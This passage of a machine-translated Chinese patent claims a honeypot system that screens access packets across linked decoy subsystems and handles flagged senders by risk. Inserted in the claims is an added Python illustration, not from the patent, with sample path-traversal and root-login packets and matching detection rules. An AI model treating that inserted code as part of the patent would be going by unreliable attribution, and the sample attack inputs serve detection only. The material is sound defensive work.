And if the protocol used by the analysis data packet is a preset protocol in the screening rule corresponding to the currently screened attack induction subsystem, and/or the corresponding access characteristic accords with the specific access characteristic of the preset suspicious user in the screening rule corresponding to the currently screened attack induction subsystem, determining that the analysis data packet is a suspicious analysis data packet.
7. The method for securely managing access data according to claim 6, wherein the step of performing feature matching on the suspicious parsed data packet based on attack feature information of attack data packets preset in a screening rule corresponding to the currently screened attack-inducing subsystem, and determining attack data packets in the access data packet based on a matching result, includes:
performing keyword matching on the suspicious analysis data packet based on the preset attack data packet keywords in the screening rules corresponding to the currently screened attack induction subsystem;
determining the suspicious analysis data packet successfully matched as a high suspicious analysis data packet;
and determining an attack data packet in the access data packet based on the high-suspicious analysis data packet.
8. The method for securely managing access data according to claim 7, wherein said determining an attack packet in said access packet based on said high-suspicious parsed packet comprises:
If the payload of the high-suspicious analysis data packet contains the vulnerability characteristics of the preset vulnerability in the screening rules corresponding to the currently screened attack induction subsystem; and/or, the association content associated with the internet of things protocol in the high-suspicious analysis data packet has the attack characteristics aiming at the internet of things protocol in the screening rule corresponding to the currently screened attack induction subsystem; and/or, the data of the high-suspicious analytic data packet has the attack characteristics of preset attack network technologies in the screening rules corresponding to the currently screened attack induction subsystem;
and determining the access data packet corresponding to the high-suspicious analysis data packet as an attack data packet.
9. The method for security management of access data according to any one of claims 1 to 4, wherein the processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system includes:
according to the information of the sending user of the attack data packet, determining the attack data packet of the same sending user aiming at all attack induction subsystems as the user associated attack data packet of the sending user;
Determining the attack risk of the user associated attack data packets of the same transmitting user according to the number of the user associated attack data packets of the same transmitting user, the number of the attack induction subsystems attacked by the user associated attack data packets, the attack induction capacity and the screening rules of the user associated attack data packets;
And processing the user associated attack data packet according to the attack risk of the user associated attack data packet of the same transmitting user according to a processing mode corresponding to the attack risk.
10. A security management apparatus for accessing data, comprising:
the deployment unit is used for acquiring a system deployment file of the attack induction subsystem in the attack induction system; the attack induction subsystem comprises at least two associated attack induction subsystems sharing a first induction server; based on the deployment mode of at least one associated attack induction subsystem and a system deployment file, deploying the first induction server in a public network; according to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying other server induction devices except the first induction server in the server induction devices of the associated attack induction subsystems; the server side induction equipment comprises an induction server; according to the deployment mode and the system deployment file of each associated attack induction subsystem, deploying induction client equipment of each associated attack induction subsystem in a corresponding client end deployment network;
A data packet acquisition unit, configured to acquire access data packets received by at least one induction server in an attack induction system, wherein the attack induction system comprises at least two attack induction subsystems, and each attack induction subsystem comprises an induction server and at least one induction client device connected with the induction server;
the screening scheme determining unit is used for determining screening sequences and screening rules of attack data packets of each attack induction subsystem according to the attack induction capacity of the attack induction subsystem;
a screening object determining unit, configured to determine a currently screened attack induction subsystem based on a screening order of each attack induction subsystem;
a first screening unit, configured to, if the currently screened attack induction subsystem is the foremost in the screening order, determine the attack data packets among the access data packets based on the screening rule corresponding to the currently screened attack induction subsystem and the access data packets received by it;
a second screening unit, configured to, if the currently screened attack induction subsystem is not the foremost in the screening order, obtain the sending users of the attack data packets already screened out from the screening results of the previously screened attack induction subsystems, determine that any access data packet received by the currently screened attack induction subsystem and sent by one of those sending users is an attack data packet, and then determine, based on the screening rule corresponding to the currently screened attack induction subsystem and its still-unselected access data packets, the attack data packets among those unselected access data packets;
and the processing unit is used for processing the attack data packet based on the determined attack risk of the attack data packet to the attack induction system.
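The cascade that the screening units above describe, as an added illustration that is not code from the patent: subsystems are screened in order of attack induction capacity, a later subsystem first inherits the senders already flagged upstream and only then applies its own rule to the packets still unselected, and the processing step acts on the result. The packets, the per-subsystem rules and the risk policy (block a sender seen attacking two or more subsystems) are constructed assumptions.

```python
# Added example (not the patent's code): cascading screening of access packets
# across honeypot ("attack induction") subsystems as described in claim 10.
# Sample packets, screening rules and the risk policy are constructed assumptions.
from collections import namedtuple

Packet = namedtuple("Packet", "subsystem sender path")      # received by, from, request
Subsystem = namedtuple("Subsystem", "name capacity rule")  # rule: Packet -> bool

def screen(subsystems, packets):
    """Return {packet_index: reason} for every packet judged to be an attack."""
    # screening order: higher attack induction capacity is screened first
    order = sorted(subsystems, key=lambda s: s.capacity, reverse=True)
    flagged, attack_senders = {}, set()
    for sub in order:
        mine = [i for i, p in enumerate(packets) if p.subsystem == sub.name]
        if sub is not order[0]:
            # not foremost: packets from senders already flagged upstream are attacks
            for i in mine:
                if packets[i].sender in attack_senders:
                    flagged[i] = "sender flagged by earlier subsystem"
        # then this subsystem's own rule over its still-unselected packets
        for i in mine:
            if i not in flagged and sub.rule(packets[i]):
                flagged[i] = f"rule of {sub.name}"
        attack_senders.update(packets[i].sender for i in mine if i in flagged)
    return flagged

def process(subsystems, packets):
    """Assumed risk policy: block a sender seen attacking 2+ subsystems, else log."""
    hits = {}
    for i in screen(subsystems, packets):
        hits.setdefault(packets[i].sender, set()).add(packets[i].subsystem)
    return {s: "block" if len(subs) >= 2 else "log" for s, subs in hits.items()}

# constructed sample: the higher-capacity "web" subsystem is screened first
SUBSYSTEMS = [
    Subsystem("ssh", 1, lambda p: p.path.startswith("login:")),
    Subsystem("web", 3, lambda p: "../" in p.path),
]
PACKETS = [
    Packet("web", "10.0.0.5", "/index.html"),
    Packet("web", "10.0.0.9", "/../../secret"),
    Packet("ssh", "10.0.0.9", "login:root"),   # flagged by inheritance, not by rule
    Packet("ssh", "10.0.0.7", "banner"),
    Packet("ssh", "10.0.0.7", "login:admin"),
]
```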
11. A computer device, the computer device comprising: a memory, a processor and a computer program stored on the memory and executable on the processor, wherein the processor implements the method of any one of claims 1-9 when the computer program is executed.
12. A storage medium having stored thereon a computer program which, when run on a computer, causes the computer to perform the steps of the method according to any of claims 1-9.

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202110032177.XA CN114765553B (en) 2021-01-11 2021-01-11 Security management method, device, computer equipment and storage medium for access data

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202110032177.XA CN114765553B (en) 2021-01-11 2021-01-11 Security management method, device, computer equipment and storage medium for access data

Publications (2)

Publication Number Publication Date
CN114765553A CN114765553A (en) 2022-07-19
CN114765553B CN114765553B (en) 2024-04-30

Family

ID=82363017

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202110032177.XA Active CN114765553B (en) 2021-01-11 2021-01-11 Security management method, device, computer equipment and storage medium for access data

Country Status (1)

Country Link
CN (1) CN114765553B (en)

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN106603541A (en) * 2016-12-21 2017-04-26 哈尔滨安天科技股份有限公司 Honeynet system based on differentiated flow processing mechanism
CN106656922A (en) * 2015-10-30 2017-05-10 阿里巴巴集团控股有限公司 Flow analysis based protective method and device against network attack
CN109347830A (en) * 2018-10-23 2019-02-15 中国人民解放军战略支援部队信息工程大学 Network dynamic defense system and method
CN110011982A (en) * 2019-03-19 2019-07-12 西安交通大学 Attack intelligent deception system and method based on virtualization

Also Published As

Publication number Publication date
CN114765553A (en) 2022-07-19

Similar Documents

Publication Publication Date Title
Sengupta et al. A survey of moving target defenses for network security
Baykara et al. A novel honeypot based security approach for real-time intrusion detection and prevention systems
US10382484B2 (en) Detecting attackers who target containerized clusters
US9985989B2 (en) Managing dynamic deceptive environments
Nawrocki et al. A survey on honeypot software and data analysis
Tsikerdekis et al. Approaches for preventing honeypot detection and compromise
CN112995151B (en) Access behavior processing method and device, storage medium and electronic equipment
Nicomette et al. Set-up and deployment of a high-interaction honeypot: experiment and lessons learned
US20120023572A1 (en) Malicious Attack Response System and Associated Method
Koniaris et al. Analysis and visualization of SSH attacks using honeypots
Rebecchi et al. DDoS protection with stateful software‐defined networking
US10243983B2 (en) System and method for using simulators in network security and useful in IoT security
Osanaiye et al. TCP/IP header classification for detecting spoofed DDoS attack in Cloud environment
CN113179280A (en) Deception defense method and device based on malicious code external connection behaviors and electronic equipment
Chawda et al. Dynamic & hybrid honeypot model for scalable network monitoring
Udhani et al. Human vs bots: Detecting human attacks in a honeypot environment
Sokol et al. Definition of attack in the context of low-level interaction server honeypots
CN114765553B (en) Security management method, device, computer equipment and storage medium for access data
Hormozi et al. An SDN‐based DDoS defense approach using route obfuscation
Khirwadkar Defense against network attacks using game theory
Vishnevsky et al. A survey of game-theoretic approaches to modeling honeypots
Shaw et al. Poster: Evaluating reflective deception as a malware mitigation strategy
CN114285660B (en) Honey net deployment method, device, equipment and medium
Agrawal et al. Long-Term Study of Honeypots in a Public Cloud
Hux Design and Implementation of a Traffic Sinkhole for Cyberattack Analysis

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant